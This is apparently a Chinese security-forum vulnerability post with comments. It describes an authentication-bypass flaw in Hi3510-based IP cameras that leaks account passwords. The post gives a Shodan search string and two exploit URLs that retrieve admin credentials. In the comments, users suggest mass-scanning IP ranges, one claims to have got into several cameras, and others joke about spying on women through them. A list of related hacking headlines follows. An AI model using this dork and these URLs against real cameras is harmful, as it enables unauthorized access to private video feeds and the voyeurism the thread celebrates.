提交通用不通过,如下:
提交非通用也不通过,如下:
某款ipCAM网络摄像机隐私泄漏直接获取帐号密码
漏洞内容:
shodanhq搜索:index.html ipcam
原理参考:
Foscam/Wansview H.264 Hi3510/11/12 IP cameras是基于网络的IP摄像头实现。 基于(1)Foscam和(2)Wansview IP cameras上的网络接口中存在漏洞。通过对未指明的URL发送直接请求,远程攻击者利用该漏洞绕过身份验证,进而执行管理功能或读取admin密码。
http://cve.scap.org.cn/CVE-2012-3002.html
利用方式:
http://地址:1080/web/cgi-bin/hi3510/param.cgi?cmd=getuser
http://地址/web/cgi-bin/hi3510/param.cgi?cmd=getuser
相关讨论:
1#
郭斯特 (c# php winform) | 2014-07-25 23:40
屌爆了!!~
2#
YY-2012 (SM沐足桑拿推拿来前订房优惠多多 一条龙服务) | 2014-07-25 23:42
@郭斯特 有人找你。
http://zone.wooyun.org/content/14082
3#
YY-2012 (SM沐足桑拿推拿来前订房优惠多多 一条龙服务) | 2014-07-25 23:44
扫描发现,,很多不知明牌子网络摄像机都能这样获取帐号密码。。
4#
郭斯特 (c# php winform) | 2014-07-25 23:44
@YY-2012 - -!卧槽表示什么都不知道就给宰了。。
5#
YY-2012 (SM沐足桑拿推拿来前订房优惠多多 一条龙服务) | 2014-07-25 23:45
基于普通用户群,IP随时变换所以案例难找。不过可以群扫IP段。。
6#
Dennx (Hahhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh呢号括束结的我,欸 ) | 2014-07-25 23:52
av直播
7#
1fn0 | 2014-07-25 23:59
坐等直播
8#
YY-2012 (SM沐足桑拿推拿来前订房优惠多多 一条龙服务) | 2014-07-26 00:49
感觉和这洞差不多
www.wooyun.org/bugs/wooyun-2014-066640
9#
正好五个字 | 2014-07-26 07:54
国内知名视频厂商还弱密码呢!不过几乎在内网
10#
Anymous | 2014-07-26 08:08
没妹子的监控,怎么能过!
11#
继续沉默 (哥就是帅) | 2014-07-26 08:42
通用的有钱不?
12#
蒙塔基的钢弹 (放下面子,求真学习,拾起斗志,用心渗透!) | 2014-07-26 10:12
确实不错,进去了几台!~
13#
魇 | 2014-07-26 12:45
这种实例不多的你是怎么测试到这个产品的?
14#
YY-2012 (SM沐足桑拿推拿来前订房优惠多多 一条龙服务) | 2014-07-26 13:08
@魇 my home is buy ipCAM
15#
小火苗 (好好学习,天天向上) | 2014-07-26 13:46
我靠,牛逼,
16#
0749orz (你这个B装的真有意思,教我装B技巧与演练吧) | 2014-07-26 20:14
没妹子的监控,怎么能过!
17#
从容 (快点交出0day,我保证不砍死你- -.) | 2014-07-26 20:21
@0749orz 没洗澡的监控,怎么能过?
18#
风花雪月 (多喜欢我自己!) | 2014-07-26 20:27
我喜欢这个哈哈 !!
19#
YY-2012 (SM沐足桑拿推拿来前订房优惠多多 一条龙服务) | 2014-07-26 22:49
@从容 @0749orz 你们都是禽兽,不过我喜欢
20#
小表哥 | 2014-07-27 08:45
@YY-2012 有动态域名之类的吧
相关内容:
某款网络摄像机直接获取帐号密码,视频监控设备配置信息泄露漏洞
使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全
黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神
女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹
指纹门控的安全,户外物理设备入侵,如何入侵绕过指纹识别安全锁、门控系统
揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息
已更新Iwork10测评!求推荐一款便携式户外物理移动渗透终端设备!!!
一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式?
Hikvision IP Cameras Multiple Vulnerabilities,海康威视IP摄像机的多个漏洞
Hikvision IP Cameras Multiple Vulnerabilities, 海康威视IP摄像机的多个漏洞
已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性?
【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工
ATM 机里装着什么?ATM 机的结构是什么?ATM 的构造原理?
关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料?
伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙!
讨论:通过无线路由渗透入侵内网电脑,如何从无线路由器到个人PC机?
谈谈时事:电话“诈”弹导致多地机场飞机被迫返航,论如何打电话不被追踪
小米云服务同步“wlan设置”的安全性,小米已收集了32万wifi明文密码
(视频)USRP 来Sniffing 无线键盘,27Mhz keyboard sniffing
(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing
(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing
全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞
超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她
讨论如何通过航空飞机的互联网入侵、劫持飞机上的乘客,入侵劫持卫星
R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B)
rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹ADS-B/TCAS/SSR
rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR
电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪
rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪
视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点
户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机)
GNU Radio USRP OpenBTS 小区短信 区域短信
一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截
周末湖边 Sniffing ADS-B,Hack 私人小型机场
Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入
android软件外加监控,隐私安全?!爆个一键root内幕!
关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论
远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击
dSploit—Android网络渗透套件测试小记(含视频)
实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump)
武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人
美国极超音速飞机90分钟飞越半球,时速可达4000千米,飞行在太空边缘
视频:FPSRussia的俄式军火秀 遥控武装四桨直升机[中英双语字幕]
免费 WiFi 是“披着羊皮的狼”,女子蹭网引来20多名警察
Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班
用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话
用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话
iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器
Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗
iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号
德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机
802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks
手机全息投影、初音、Miku、立体投影,制作方法已放出,图文+视频
从技术角度深入剖析:改号软件,电话号码任意显示,伪造来电显示
华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕
视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播
视频:漂浮在空中的水珠、静止的水滴,适合做成展品的视错觉,超炫!!
利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备
电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍?
视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步!
用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位
不要偷黑客的东西 - Why you don't steal from a hacker
【视频】发射到121000英尺(36880.8米)摄影机拍摄地球